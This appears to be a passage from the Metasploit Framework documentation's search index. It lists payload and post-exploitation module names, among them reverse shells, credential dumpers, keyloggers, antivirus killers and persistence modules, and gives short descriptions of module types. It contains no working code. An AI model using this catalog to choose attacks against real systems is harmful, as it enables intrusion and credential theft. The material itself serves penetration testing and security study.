payload/solaris/sparc/shell_reverse_tcp | . | x86 (3) . | payload/solaris/x86/shell_bind_tcp | payload/solaris/x86/shell_find_port | payload/solaris/x86/shell_reverse_tcp | . | . | tty (1) . | unix (1) . | payload/tty/unix/interact | . | . | windows (301) . | custom (28) . | payload/windows/custom/bind_hidden_ipknock_tcp | payload/windows/custom/bind_hidden_tcp | payload/windows/custom/bind_ipv6_tcp | payload/windows/custom/bind_ipv6_tcp_uuid | payload/windows/custom/bind_named_pipe | payload/windows/custom/bind_nonx_tcp | payload/windows/custom/bind_tcp | payload/windows/custom/bind_tcp_rc4 | payload/windows/custom/bind_tcp_uuid | payload/windows/custom/find_tag | payload/windows/custom/reverse_hop_http | payload/windows/custom/reverse_http | payload/windows/custom/reverse_http_proxy_pstore | payload/windows/custom/reverse_https | payload/windows/custom/reverse_https_proxy | payload/windows/custom/reverse_ipv6_tcp | payload/windows/custom/reverse_named_pipe | payload/windows/custom/reverse_nonx_tcp | payload/windows/custom/reverse_ord_tcp | payload/windows/custom/reverse_tcp | payload/windows/custom/reverse_tcp_allports | payload/windows/custom/reverse_tcp_dns | payload/windows/custom/reverse_tcp_rc4 | payload/windows/custom/reverse_tcp_rc4_dns | payload/windows/custom/reverse_tcp_uuid | payload/windows/custom/reverse_udp | payload/windows/custom/reverse_winhttp | payload/windows/custom/reverse_winhttps | . | dllinject (23) . | payload/windows/dllinject/bind_hidden_ipknock_tcp | payload/windows/dllinject/bind_hidden_tcp | payload/windows/dllinject/bind_ipv6_tcp | payload/windows/dllinject/bind_ipv6_tcp_uuid | payload/windows/dllinject/bind_named_pipe | payload/windows/dllinject/bind_nonx_tcp | payload/windows/dllinject/bind_tcp | payload/windows/dllinject/bind_tcp_rc4 | payload/windows/dllinject/bind_tcp_uuid | payload/windows/dllinject/find_tag | payload/windows/dllinject/reverse_hop_http | payload/windows/dllinject/reverse_http | payload/windows/dllinject/reverse_http_proxy_pstore | payload/windows/dllinject/reverse_ipv6_tcp | payload/windows/dllinject/reverse_nonx_tcp | payload/windows/dllinject/reverse_ord_tcp | payload/windows/dllinject/reverse_tcp | payload/windows/dllinject/reverse_tcp_allports | payload/windows/dllinject/reverse_tcp_dns | payload/windows/dllinject/reverse_tcp_rc4 | payload/windows/dllinject/reverse_tcp_rc4_dns | payload/windows/dllinject/reverse_tcp_uuid | payload/windows/dllinject/reverse_winhttp | . | meterpreter (27) . | payload/windows/meterpreter/bind_hidden_ipknock_tcp | payload/windows/meterpreter/bind_hidden_tcp | payload/windows/meterpreter/bind_ipv6_tcp | payload/windows/meterpreter/bind_ipv6_tcp_uuid | payload/windows/meterpreter/bind_named_pipe | payload/windows/meterpreter/bind_nonx_tcp | payload/windows/meterpreter/bind_tcp | payload/windows/meterpreter/bind_tcp_rc4 | payload/windows/meterpreter/bind_tcp_uuid | payload/windows/meterpreter/find_tag | payload/windows/meterpreter/reverse_hop_http | payload/windows/meterpreter/reverse_http | payload/windows/meterpreter/reverse_http_proxy_pstore | payload/windows/meterpreter/reverse_https | payload/windows/meterpreter/reverse_https_proxy | payload/windows/meterpreter/reverse_ipv6_tcp | payload/windows/meterpreter/reverse_named_pipe | payload/windows/meterpreter/reverse_nonx_tcp | payload/windows/meterpreter/reverse_ord_tcp | payload/windows/meterpreter/reverse_tcp | payload/windows/meterpreter/reverse_tcp_allports | payload/windows/meterpreter/reverse_tcp_dns | payload/windows/meterpreter/reverse_tcp_rc4 | payload/windows/meterpreter/reverse_tcp_rc4_dns | payload/windows/meterpreter/reverse_tcp_uuid | payload/windows/meterpreter/reverse_winhttp | payload/windows/meterpreter/reverse_winhttps | . | patchupdllinject (19) . | payload/windows/patchupdllinject/bind_hidden_ipknock_tcp | payload/windows/patchupdllinject/bind_hidden_tcp | payload/windows/patchupdllinject/bind_ipv6_tcp | payload/windows/patchupdllinject/bind_ipv6_tcp_uuid | payload/windows/patchupdllinject/bind_named_pipe | payload/windows/patchupdllinject/bind_nonx_tcp | payload/windows/patchupdllinject/bind_tcp | payload/windows/patchupdllinject/bind_tcp_rc4 | payload/windows/patchupdllinject/bind_tcp_uuid | payload/windows/patchupdllinject/find_tag | payload/windows/patchupdllinject/reverse_ipv6_tcp | payload/windows/patchupdllinject/reverse_nonx_tcp | payload/windows/patchupdllinject/reverse_ord_tcp | payload/windows/patchupdllinject/reverse_tcp | payload/windows/patchupdllinject/reverse_tcp_allports | payload/windows/patchupdllinject/reverse_tcp_dns | payload/windows/patchupdllinject/reverse_tcp_rc4 | payload/windows/patchupdllinject/reverse_tcp_rc4_dns | payload/windows/patchupdllinject/reverse_tcp_uuid | . | patchupmeterpreter (19) . | payload/windows/patchupmeterpreter/bind_hidden_ipknock_tcp | payload/windows/patchupmeterpreter/bind_hidden_tcp | payload/windows/patchupmeterpreter/bind_ipv6_tcp | payload/windows/patchupmeterpreter/bind_ipv6_tcp_uuid | payload/windows/patchupmeterpreter/bind_named_pipe | payload/windows/patchupmeterpreter/bind_nonx_tcp | payload/windows/patchupmeterpreter/bind_tcp | payload/windows/patchupmeterpreter/bind_tcp_rc4 | payload/windows/patchupmeterpreter/bind_tcp_uuid | payload/windows/patchupmeterpreter/find_tag | payload/windows/patchupmeterpreter/reverse_ipv6_tcp | payload/windows/patchupmeterpreter/reverse_nonx_tcp | payload/windows/patchupmeterpreter/reverse_ord_tcp | payload/windows/patchupmeterpreter/reverse_tcp | payload/windows/patchupmeterpreter/reverse_tcp_allports | payload/windows/patchupmeterpreter/reverse_tcp_dns | payload/windows/patchupmeterpreter/reverse_tcp_rc4 | payload/windows/patchupmeterpreter/reverse_tcp_rc4_dns | payload/windows/patchupmeterpreter/reverse_tcp_uuid | . | peinject (20) . | payload/windows/peinject/bind_hidden_ipknock_tcp | payload/windows/peinject/bind_hidden_tcp | payload/windows/peinject/bind_ipv6_tcp | payload/windows/peinject/bind_ipv6_tcp_uuid | payload/windows/peinject/bind_named_pipe | payload/windows/peinject/bind_nonx_tcp | payload/windows/peinject/bind_tcp | payload/windows/peinject/bind_tcp_rc4 | payload/windows/peinject/bind_tcp_uuid | payload/windows/peinject/find_tag | payload/windows/peinject/reverse_ipv6_tcp | payload/windows/peinject/reverse_named_pipe | payload/windows/peinject/reverse_nonx_tcp | payload/windows/peinject/reverse_ord_tcp | payload/windows/peinject/reverse_tcp | payload/windows/peinject/reverse_tcp_allports | payload/windows/peinject/reverse_tcp_dns | payload/windows/peinject/reverse_tcp_rc4 | payload/windows/peinject/reverse_tcp_rc4_dns | payload/windows/peinject/reverse_tcp_uuid | . | shell (20) . | payload/windows/shell/bind_hidden_ipknock_tcp | payload/windows/shell/bind_hidden_tcp | payload/windows/shell/bind_ipv6_tcp | payload/windows/shell/bind_ipv6_tcp_uuid | payload/windows/shell/bind_named_pipe | payload/windows/shell/bind_nonx_tcp | payload/windows/shell/bind_tcp | payload/windows/shell/bind_tcp_rc4 | payload/windows/shell/bind_tcp_uuid | payload/windows/shell/find_tag | payload/windows/shell/reverse_ipv6_tcp | payload/windows/shell/reverse_nonx_tcp | payload/windows/shell/reverse_ord_tcp | payload/windows/shell/reverse_tcp | payload/windows/shell/reverse_tcp_allports | payload/windows/shell/reverse_tcp_dns | payload/windows/shell/reverse_tcp_rc4 | payload/windows/shell/reverse_tcp_rc4_dns | payload/windows/shell/reverse_tcp_uuid | payload/windows/shell/reverse_udp | . | upexec (20) . | payload/windows/upexec/bind_hidden_ipknock_tcp | payload/windows/upexec/bind_hidden_tcp | payload/windows/upexec/bind_ipv6_tcp | payload/windows/upexec/bind_ipv6_tcp_uuid | payload/windows/upexec/bind_named_pipe | payload/windows/upexec/bind_nonx_tcp | payload/windows/upexec/bind_tcp | payload/windows/upexec/bind_tcp_rc4 | payload/windows/upexec/bind_tcp_uuid | payload/windows/upexec/find_tag | payload/windows/upexec/reverse_ipv6_tcp | payload/windows/upexec/reverse_nonx_tcp | payload/windows/upexec/reverse_ord_tcp | payload/windows/upexec/reverse_tcp | payload/windows/upexec/reverse_tcp_allports | payload/windows/upexec/reverse_tcp_dns | payload/windows/upexec/reverse_tcp_rc4 | payload/windows/upexec/reverse_tcp_rc4_dns | payload/windows/upexec/reverse_tcp_uuid | payload/windows/upexec/reverse_udp | . | vncinject (23) . | payload/windows/vncinject/bind_hidden_ipknock_tcp | payload/windows/vncinject/bind_hidden_tcp | payload/windows/vncinject/bind_ipv6_tcp | payload/windows/vncinject/bind_ipv6_tcp_uuid | payload/windows/vncinject/bind_named_pipe | payload/windows/vncinject/bind_nonx_tcp | payload/windows/vncinject/bind_tcp | payload/windows/vncinject/bind_tcp_rc4 | payload/windows/vncinject/bind_tcp_uuid | payload/windows/vncinject/find_tag | payload/windows/vncinject/reverse_hop_http | payload/windows/vncinject/reverse_http | payload/windows/vncinject/reverse_http_proxy_pstore | payload/windows/vncinject/reverse_ipv6_tcp | payload/windows/vncinject/reverse_nonx_tcp | payload/windows/vncinject/reverse_ord_tcp | payload/windows/vncinject/reverse_tcp | payload/windows/vncinject/reverse_tcp_allports | payload/windows/vncinject/reverse_tcp_dns | payload/windows/vncinject/reverse_tcp_rc4 | payload/windows/vncinject/reverse_tcp_rc4_dns | payload/windows/vncinject/reverse_tcp_uuid | payload/windows/vncinject/reverse_winhttp | . | x64 (77) . | custom (14) . | payload/windows/x64/custom/bind_ipv6_tcp | payload/windows/x64/custom/bind_ipv6_tcp_uuid | payload/windows/x64/custom/bind_named_pipe | payload/windows/x64/custom/bind_tcp | payload/windows/x64/custom/bind_tcp_rc4 | payload/windows/x64/custom/bind_tcp_uuid | payload/windows/x64/custom/reverse_http | payload/windows/x64/custom/reverse_https | payload/windows/x64/custom/reverse_named_pipe | payload/windows/x64/custom/reverse_tcp | payload/windows/x64/custom/reverse_tcp_rc4 | payload/windows/x64/custom/reverse_tcp_uuid | payload/windows/x64/custom/reverse_winhttp | payload/windows/x64/custom/reverse_winhttps | . | encrypted_shell (1) . | payload/windows/x64/encrypted_shell/reverse_tcp | . | meterpreter (14) . | payload/windows/x64/meterpreter/bind_ipv6_tcp | payload/windows/x64/meterpreter/bind_ipv6_tcp_uuid | payload/windows/x64/meterpreter/bind_named_pipe | payload/windows/x64/meterpreter/bind_tcp | payload/windows/x64/meterpreter/bind_tcp_rc4 | payload/windows/x64/meterpreter/bind_tcp_uuid | payload/windows/x64/meterpreter/reverse_http | payload/windows/x64/meterpreter/reverse_https | payload/windows/x64/meterpreter/reverse_named_pipe | payload/windows/x64/meterpreter/reverse_tcp | payload/windows/x64/meterpreter/reverse_tcp_rc4 | payload/windows/x64/meterpreter/reverse_tcp_uuid | payload/windows/x64/meterpreter/reverse_winhttp | payload/windows/x64/meterpreter/reverse_winhttps | . | peinject (10) . | payload/windows/x64/peinject/bind_ipv6_tcp | payload/windows/x64/peinject/bind_ipv6_tcp_uuid | payload/windows/x64/peinject/bind_named_pipe | payload/windows/x64/peinject/bind_tcp | payload/windows/x64/peinject/bind_tcp_rc4 | payload/windows/x64/peinject/bind_tcp_uuid | payload/windows/x64/peinject/reverse_named_pipe | payload/windows/x64/peinject/reverse_tcp | payload/windows/x64/peinject/reverse_tcp_rc4 | payload/windows/x64/peinject/reverse_tcp_uuid | . | shell (9) . | payload/windows/x64/shell/bind_ipv6_tcp | payload/windows/x64/shell/bind_ipv6_tcp_uuid | payload/windows/x64/shell/bind_named_pipe | payload/windows/x64/shell/bind_tcp | payload/windows/x64/shell/bind_tcp_rc4 | payload/windows/x64/shell/bind_tcp_uuid | payload/windows/x64/shell/reverse_tcp | payload/windows/x64/shell/reverse_tcp_rc4 | payload/windows/x64/shell/reverse_tcp_uuid | . | vncinject (13) . | payload/windows/x64/vncinject/bind_ipv6_tcp | payload/windows/x64/vncinject/bind_ipv6_tcp_uuid | payload/windows/x64/vncinject/bind_named_pipe | payload/windows/x64/vncinject/bind_tcp | payload/windows/x64/vncinject/bind_tcp_rc4 | payload/windows/x64/vncinject/bind_tcp_uuid | payload/windows/x64/vncinject/reverse_http | payload/windows/x64/vncinject/reverse_https | payload/windows/x64/vncinject/reverse_tcp | payload/windows/x64/vncinject/reverse_tcp_rc4 | payload/windows/x64/vncinject/reverse_tcp_uuid | payload/windows/x64/vncinject/reverse_winhttp | payload/windows/x64/vncinject/reverse_winhttps | . | payload/windows/x64/encrypted_shell_reverse_tcp | payload/windows/x64/exec | payload/windows/x64/loadlibrary | payload/windows/x64/messagebox | payload/windows/x64/meterpreter_bind_named_pipe | payload/windows/x64/meterpreter_bind_tcp | payload/windows/x64/meterpreter_reverse_http | payload/windows/x64/meterpreter_reverse_https | payload/windows/x64/meterpreter_reverse_ipv6_tcp | payload/windows/x64/meterpreter_reverse_tcp | payload/windows/x64/pingback_reverse_tcp | payload/windows/x64/powershell_bind_tcp | payload/windows/x64/powershell_reverse_tcp | payload/windows/x64/powershell_reverse_tcp_ssl | payload/windows/x64/shell_bind_tcp | payload/windows/x64/shell_reverse_tcp | . | payload/windows/adduser | payload/windows/dns_txt_query_exec | payload/windows/download_exec | payload/windows/exec | payload/windows/format_all_drives | payload/windows/loadlibrary | payload/windows/messagebox | payload/windows/meterpreter_bind_named_pipe | payload/windows/meterpreter_bind_tcp | payload/windows/meterpreter_reverse_http | payload/windows/meterpreter_reverse_https | payload/windows/meterpreter_reverse_ipv6_tcp | payload/windows/meterpreter_reverse_tcp | payload/windows/metsvc_bind_tcp | payload/windows/metsvc_reverse_tcp | payload/windows/pingback_bind_tcp | payload/windows/pingback_reverse_tcp | payload/windows/powershell_bind_tcp | payload/windows/powershell_reverse_tcp | payload/windows/powershell_reverse_tcp_ssl | payload/windows/shell_bind_tcp | payload/windows/shell_bind_tcp_xpfw | payload/windows/shell_hidden_bind_tcp | payload/windows/shell_reverse_tcp | payload/windows/speak_pwned | . | . | post (430) . | aix (1) . | post/aix/hashdump | . | android (7) . | capture (1) . | post/android/capture/screen | . | gather (3) . | post/android/gather/hashdump | post/android/gather/sub_info | post/android/gather/wireless_ap | . | local (1) . | post/android/local/koffee | . | manage (2) . | post/android/manage/remove_lock | post/android/manage/remove_lock_root | . | . | apple_ios (2) . | gather (2) . | post/apple_ios/gather/ios_image_gather | post/apple_ios/gather/ios_text_gather | . | . | bsd (1) . | gather (1) . | post/bsd/gather/hashdump | . | . | firefox (5) . | gather (4) . | post/firefox/gather/cookies | post/firefox/gather/history | post/firefox/gather/passwords | post/firefox/gather/xss | . | manage (1) . | post/firefox/manage/webcam_chat | . | . | hardware (12) . | automotive (9) . | post/hardware/automotive/can_flood | post/hardware/automotive/canprobe | post/hardware/automotive/diagnostic_state | post/hardware/automotive/ecu_hard_reset | post/hardware/automotive/getvinfo | post/hardware/automotive/identifymodules | post/hardware/automotive/malibu_overheat | post/hardware/automotive/mazda_ic_mover | post/hardware/automotive/pdt | . | rftransceiver (2) . | post/hardware/rftransceiver/rfpwnon | post/hardware/rftransceiver/transmitter | . | zigbee (1) . | post/hardware/zigbee/zstumbler | . | . | linux (47) . | busybox (8) . | post/linux/busybox/enum_connections | post/linux/busybox/enum_hosts | post/linux/busybox/jailbreak | post/linux/busybox/ping_net | post/linux/busybox/set_dmz | post/linux/busybox/set_dns | post/linux/busybox/smb_share_root | post/linux/busybox/wget_exec | . | dos (1) . | post/linux/dos/xen_420_dos | . | gather (30) . | post/linux/gather/ansible | post/linux/gather/ansible_playbook_error_message_file_reader | post/linux/gather/apache_nifi_credentials | post/linux/gather/checkcontainer | post/linux/gather/checkvm | post/linux/gather/ecryptfs_creds | post/linux/gather/enum_commands | post/linux/gather/enum_configs | post/linux/gather/enum_containers | post/linux/gather/enum_nagios_xi | post/linux/gather/enum_network | post/linux/gather/enum_protections | post/linux/gather/enum_psk | post/linux/gather/enum_system | post/linux/gather/enum_users_history | post/linux/gather/f5_loot_mcp | post/linux/gather/gnome_commander_creds | post/linux/gather/gnome_keyring_dump | post/linux/gather/haserl_read | post/linux/gather/hashdump | post/linux/gather/manageengine_password_manager_creds | post/linux/gather/mimipenguin | post/linux/gather/mount_cifs_creds | post/linux/gather/openvpn_credentials | post/linux/gather/phpmyadmin_credsteal | post/linux/gather/pptpd_chap_secrets | post/linux/gather/puppet | post/linux/gather/rancher_audit_log_leak | post/linux/gather/tor_hiddenservices | post/linux/gather/vcenter_secrets_dump | . | manage (8) . | post/linux/manage/adduser | post/linux/manage/disable_clamav | post/linux/manage/dns_spoofing | post/linux/manage/download_exec | post/linux/manage/geutebruck_post_exp | post/linux/manage/iptables_removal | post/linux/manage/pseudo_shell | post/linux/manage/sshkey_persistence | . | . | multi (78) . | escalate (3) . | post/multi/escalate/aws_create_iam_user | post/multi/escalate/cups_root_file_read | post/multi/escalate/metasploit_pcaplog | . | gather (50) . | post/multi/gather/apple_ios_backup | post/multi/gather/aws_ec2_instance_metadata | post/multi/gather/aws_keys | post/multi/gather/azure_cli_creds | post/multi/gather/check_malware | post/multi/gather/chrome_cookies | post/multi/gather/dbeaver | post/multi/gather/dbvis_enum | post/multi/gather/dns_bruteforce | post/multi/gather/dns_reverse_lookup | post/multi/gather/dns_srv_lookup | post/multi/gather/docker_creds | post/multi/gather/electerm | post/multi/gather/enum_hexchat | post/multi/gather/enum_software_versions | post/multi/gather/enum_vbox | post/multi/gather/env | post/multi/gather/fetchmailrc_creds | post/multi/gather/filezilla_client_cred | post/multi/gather/find_vmx | post/multi/gather/firefox_creds | post/multi/gather/gpg_creds | post/multi/gather/grub_creds | post/multi/gather/irssi_creds | post/multi/gather/jboss_gather | post/multi/gather/jenkins_gather | post/multi/gather/lastpass_creds | post/multi/gather/maven_creds | post/multi/gather/memory_search | post/multi/gather/minio_client | post/multi/gather/multi_command | post/multi/gather/netrc_creds | post/multi/gather/pgpass_creds | post/multi/gather/pidgin_cred | post/multi/gather/ping_sweep | post/multi/gather/remmina_creds | post/multi/gather/resolve_hosts | post/multi/gather/rsyncd_creds | post/multi/gather/rubygems_api_key | post/multi/gather/run_console_rc_file | post/multi/gather/saltstack_salt | post/multi/gather/skype_enum | post/multi/gather/ssh_creds | post/multi/gather/thunderbird_creds | post/multi/gather/tomcat_gather | post/multi/gather/ubiquiti_unifi_backup | post/multi/gather/unix_cached_ad_hashes | post/multi/gather/unix_kerberos_tickets | post/multi/gather/wlan_geolocate | post/multi/gather/wowza_streaming_engine_creds | . | general (3) . | post/multi/general/close | post/multi/general/execute | post/multi/general/wall | . | manage (17) . | post/multi/manage/autoroute | post/multi/manage/dbvis_add_db_admin | post/multi/manage/dbvis_query | post/multi/manage/fileshare | post/multi/manage/hsts_eraser | post/multi/manage/multi_post | post/multi/manage/open | post/multi/manage/play_youtube | post/multi/manage/record_mic | post/multi/manage/screensaver | post/multi/manage/screenshare | post/multi/manage/set_wallpaper | post/multi/manage/shell_to_meterpreter | post/multi/manage/sudo | post/multi/manage/system_session | post/multi/manage/upload_exec | post/multi/manage/zip | . | recon (4) . | post/multi/recon/local_exploit_suggester | post/multi/recon/multiport_egress_traffic | post/multi/recon/reverse_lookup | post/multi/recon/sudo_commands | . | sap (1) . | post/multi/sap/smdagent_get_properties | . | . | networking (6) . | gather (6) . | post/networking/gather/enum_brocade | post/networking/gather/enum_cisco | post/networking/gather/enum_f5 | post/networking/gather/enum_juniper | post/networking/gather/enum_mikrotik | post/networking/gather/enum_vyos | . | . | osx (23) . | admin (1) . | post/osx/admin/say | . | capture (2) . | post/osx/capture/keylog_recorder | post/osx/capture/screen | . | escalate (1) . | post/osx/escalate/tccbypass | . | gather (14) . | post/osx/gather/apfs_encrypted_volume_passwd | post/osx/gather/autologin_password | post/osx/gather/enum_adium | post/osx/gather/enum_airport | post/osx/gather/enum_chicken_vnc_profile | post/osx/gather/enum_colloquy | post/osx/gather/enum_keychain | post/osx/gather/enum_messages | post/osx/gather/enum_osx | post/osx/gather/gitignore | post/osx/gather/hashdump | post/osx/gather/password_prompt_spoof | post/osx/gather/safari_lastsession | post/osx/gather/vnc_password_osx | . | manage (5) . | post/osx/manage/mount_share | post/osx/manage/record_mic | post/osx/manage/sonic_pi | post/osx/manage/vpn | post/osx/manage/webcam | . | . | solaris (6) . | escalate (2) . | post/solaris/escalate/pfexec | post/solaris/escalate/srsexec_readline | . | gather (4) . | post/solaris/gather/checkvm | post/solaris/gather/enum_packages | post/solaris/gather/enum_services | post/solaris/gather/hashdump | . | . | windows (242) . | capture (2) . | post/windows/capture/keylog_recorder | post/windows/capture/lockout_keylogger | . | escalate (6) . | post/windows/escalate/droplnk | post/windows/escalate/getsystem | post/windows/escalate/golden_ticket | post/windows/escalate/ms10_073_kbdlayout | post/windows/escalate/screen_unlock | post/windows/escalate/unmarshal_cmd_exec | . | gather (176) . | credentials (91) . | post/windows/gather/credentials/adi_irc | post/windows/gather/credentials/aim | post/windows/gather/credentials/avira_password | post/windows/gather/credentials/bulletproof_ftp | post/windows/gather/credentials/carotdav_ftp | post/windows/gather/credentials/chrome | post/windows/gather/credentials/comodo | post/windows/gather/credentials/coolnovo | post/windows/gather/credentials/coreftp | post/windows/gather/credentials/credential_collector | post/windows/gather/credentials/digsby | post/windows/gather/credentials/domain_hashdump | post/windows/gather/credentials/dynazip_log | post/windows/gather/credentials/dyndns | post/windows/gather/credentials/enum_cred_store | post/windows/gather/credentials/enum_laps | post/windows/gather/credentials/enum_picasa_pwds | post/windows/gather/credentials/epo_sql | post/windows/gather/credentials/filezilla_server | post/windows/gather/credentials/flashfxp | post/windows/gather/credentials/flock | post/windows/gather/credentials/ftpnavigator | post/windows/gather/credentials/ftpx | post/windows/gather/credentials/gadugadu | post/windows/gather/credentials/gpp | post/windows/gather/credentials/halloy_irc | post/windows/gather/credentials/heidisql | post/windows/gather/credentials/icq | post/windows/gather/credentials/idm | post/windows/gather/credentials/ie | post/windows/gather/credentials/imail | post/windows/gather/credentials/imvu | post/windows/gather/credentials/incredimail | post/windows/gather/credentials/kakaotalk | post/windows/gather/credentials/kmeleon | post/windows/gather/credentials/line | post/windows/gather/credentials/maxthon | post/windows/gather/credentials/mcafee_vse_hashdump | post/windows/gather/credentials/mdaemon_cred_collector | post/windows/gather/credentials/meebo | post/windows/gather/credentials/miranda | post/windows/gather/credentials/moba_xterm | post/windows/gather/credentials/mremote | post/windows/gather/credentials/mssql_local_hashdump | post/windows/gather/credentials/navicat | post/windows/gather/credentials/nimbuzz | post/windows/gather/credentials/opera | post/windows/gather/credentials/operamail | post/windows/gather/credentials/outlook | post/windows/gather/credentials/plsql_developer | post/windows/gather/credentials/postbox | post/windows/gather/credentials/pulse_secure | post/windows/gather/credentials/purevpn_cred_collector | post/windows/gather/credentials/qq | post/windows/gather/credentials/quassel_irc | post/windows/gather/credentials/razer_synapse | post/windows/gather/credentials/razorsql | post/windows/gather/credentials/rdc_manager_creds | post/windows/gather/credentials/redis_desktop_manager | post/windows/gather/credentials/safari | post/windows/gather/credentials/seamonkey | post/windows/gather/credentials/securecrt | post/windows/gather/credentials/skype | post/windows/gather/credentials/smartermail | post/windows/gather/credentials/smartftp | post/windows/gather/credentials/solarwinds_orion_dump | post/windows/gather/credentials/spark_im | post/windows/gather/credentials/srware | post/windows/gather/credentials/sso | post/windows/gather/credentials/steam | post/windows/gather/credentials/sylpheed | post/windows/gather/credentials/tango | post/windows/gather/credentials/teamviewer_passwords | post/windows/gather/credentials/thunderbird | post/windows/gather/credentials/thycotic_secretserver_dump | post/windows/gather/credentials/tlen | post/windows/gather/credentials/tortoisesvn | post/windows/gather/credentials/total_commander | post/windows/gather/credentials/trillian | post/windows/gather/credentials/veeam_credential_dump | post/windows/gather/credentials/viber | post/windows/gather/credentials/vnc | post/windows/gather/credentials/whatsupgold_credential_dump | post/windows/gather/credentials/winbox_settings | post/windows/gather/credentials/windows_autologin | post/windows/gather/credentials/windows_sam_hivenightmare | post/windows/gather/credentials/windowslivemail | post/windows/gather/credentials/winscp | post/windows/gather/credentials/wsftp_client | post/windows/gather/credentials/xchat | post/windows/gather/credentials/xshell_xftp_password | . | forensics (7) . | post/windows/gather/forensics/browser_history | post/windows/gather/forensics/duqu_check | post/windows/gather/forensics/enum_drives | post/windows/gather/forensics/fanny_bmp_check | post/windows/gather/forensics/imager | post/windows/gather/forensics/nbd_server | post/windows/gather/forensics/recovery_files | . | post/windows/gather/ad_to_sqlite | post/windows/gather/arp_scanner | post/windows/gather/avast_memory_dump | post/windows/gather/bitcoin_jacker | post/windows/gather/bitlocker_fvek | post/windows/gather/bloodhound | post/windows/gather/cachedump | post/windows/gather/checkvm | post/windows/gather/dnscache_dump | post/windows/gather/dumplinks | post/windows/gather/enum_ad_bitlocker | post/windows/gather/enum_ad_computers | post/windows/gather/enum_ad_groups | post/windows/gather/enum_ad_managedby_groups | post/windows/gather/enum_ad_service_principal_names | post/windows/gather/enum_ad_to_wordlist | post/windows/gather/enum_ad_user_comments | post/windows/gather/enum_ad_users | post/windows/gather/enum_applications | post/windows/gather/enum_artifacts | post/windows/gather/enum_av | post/windows/gather/enum_av_excluded | post/windows/gather/enum_chocolatey_applications | post/windows/gather/enum_chrome | post/windows/gather/enum_computers | post/windows/gather/enum_db | post/windows/gather/enum_devices | post/windows/gather/enum_dirperms | post/windows/gather/enum_domain | post/windows/gather/enum_domain_group_users | post/windows/gather/enum_domain_tokens | post/windows/gather/enum_domain_users | post/windows/gather/enum_domains | post/windows/gather/enum_emet | post/windows/gather/enum_files | post/windows/gather/enum_hostfile | post/windows/gather/enum_hyperv_vms | post/windows/gather/enum_ie | post/windows/gather/enum_logged_on_users | post/windows/gather/enum_ms_product_keys | post/windows/gather/enum_muicache | post/windows/gather/enum_onedrive | post/windows/gather/enum_patches | post/windows/gather/enum_powershell_env | post/windows/gather/enum_prefetch | post/windows/gather/enum_proxy | post/windows/gather/enum_putty_saved_sessions | post/windows/gather/enum_services | post/windows/gather/enum_shares | post/windows/gather/enum_snmp | post/windows/gather/enum_termserv | post/windows/gather/enum_tokens | post/windows/gather/enum_tomcat | post/windows/gather/enum_trusted_locations | post/windows/gather/enum_unattend | post/windows/gather/exchange | post/windows/gather/file_from_raw_ntfs | post/windows/gather/get_bookmarks | post/windows/gather/hashdump | post/windows/gather/local_admin_search_enum | post/windows/gather/lsa_secrets | post/windows/gather/make_csv_orgchart | post/windows/gather/memory_dump | post/windows/gather/memory_grep | post/windows/gather/netlm_downgrade | post/windows/gather/ntds_grabber | post/windows/gather/ntds_location | post/windows/gather/outlook | post/windows/gather/phish_windows_credentials | post/windows/gather/psreadline_history | post/windows/gather/resolve_sid | post/windows/gather/screen_spy | post/windows/gather/smart_hashdump | post/windows/gather/tcpnetstat | post/windows/gather/usb_history | post/windows/gather/win_privs | post/windows/gather/wmic_command | post/windows/gather/word_unc_injector | . | manage (51) . | powershell (3) . | post/windows/manage/powershell/build_net_code | post/windows/manage/powershell/exec_powershell | post/windows/manage/powershell/load_script | . | post/windows/manage/add_user | post/windows/manage/archmigrate | post/windows/manage/change_password | post/windows/manage/clone_proxy_settings | post/windows/manage/delete_user | post/windows/manage/dell_memory_protect | post/windows/manage/download_exec | post/windows/manage/driver_loader | post/windows/manage/enable_rdp | post/windows/manage/enable_support_account | post/windows/manage/exec_powershell | post/windows/manage/execute_dotnet_assembly | post/windows/manage/forward_pageant | post/windows/manage/hashcarve | post/windows/manage/ie_proxypac | post/windows/manage/inject_ca | post/windows/manage/inject_host | post/windows/manage/install_python | post/windows/manage/install_ssh | post/windows/manage/kerberos_tickets | post/windows/manage/killav | post/windows/manage/make_token | post/windows/manage/migrate | post/windows/manage/mssql_local_auth_bypass | post/windows/manage/multi_meterpreter_inject | post/windows/manage/nbd_server | post/windows/manage/peinjector | post/windows/manage/persistence_exe | post/windows/manage/portproxy | post/windows/manage/pptp_tunnel | post/windows/manage/priv_migrate | post/windows/manage/pxeexploit | post/windows/manage/reflective_dll_inject | post/windows/manage/remove_ca | post/windows/manage/remove_host | post/windows/manage/rid_hijack | post/windows/manage/rollback_defender_signatures | post/windows/manage/rpcapd_start | post/windows/manage/run_as | post/windows/manage/run_as_psh | post/windows/manage/sdel | post/windows/manage/shellcode_inject | post/windows/manage/sshkey_persistence | post/windows/manage/sticky_keys | post/windows/manage/vmdk_mount | post/windows/manage/vss | post/windows/manage/wdigest_caching | post/windows/manage/webcam | . | recon (2) . | post/windows/recon/computer_browser_discovery | post/windows/recon/outbound_ports | . | wlan (5) . | post/windows/wlan/wlan_bss_list | post/windows/wlan/wlan_current_connection | post/windows/wlan/wlan_disconnect | post/windows/wlan/wlan_probe_request | post/windows/wlan/wlan_profile | . | . | . | . | . ",
    "url": "/docs/modules.html#metasploit-modules",
    "relUrl": "/docs/modules.html#metasploit-modules"
  },"661": {
    "doc": "Modules",
    "title": "Module types",
    "content": "Auxiliary modules (1266) . Auxiliary modules do not exploit a target, but can perform useful tasks such as: . | Administration - Modify, operate, or manipulate something on target machine | Analyzing - Tools that perform analysis, mostly password cracking | Gathering - Gather, collect, or enumerate data from a single target | Denial of Service - Crash or slow a target machine or service | Scanning - Scan targets for known vulnerabilities | Server Support - Run Servers for common protocols such as SMB, FTP, etc | . Encoder modules (49) . Encoders take the raw bytes of a payload and run some sort of encoding algorithm, like bitwise XOR. These modules are useful for encoding bad characters such as null bytes. Evasion modules (9) . Evasion modules give Framework users the ability to generate evasive payloads that aim to evade AntiVirus, such as Windows Defender, without having to install external tools. Exploit modules (2460) . Exploit modules are used to leverage vulnerabilities in a manner that allows the framework to execute arbitrary code. The arbitrary code that is executed is referred to as the payload. Nop modules (11) . Nop modules, short for ‘No Operation’, generate a sequence of ‘No Operation’ instructions that perform no side-effects. NOPs are often used in conjunction with stack buffer overflows. Payloads modules (1468) . In the context of Metasploit exploit modules, payload modules encapsulate the arbitrary code (shellcode) that is executed as the result of an exploit succeeding. This normally involves the creation of a Metasploit session, but may instead execute code such as adding user accounts, or executing a 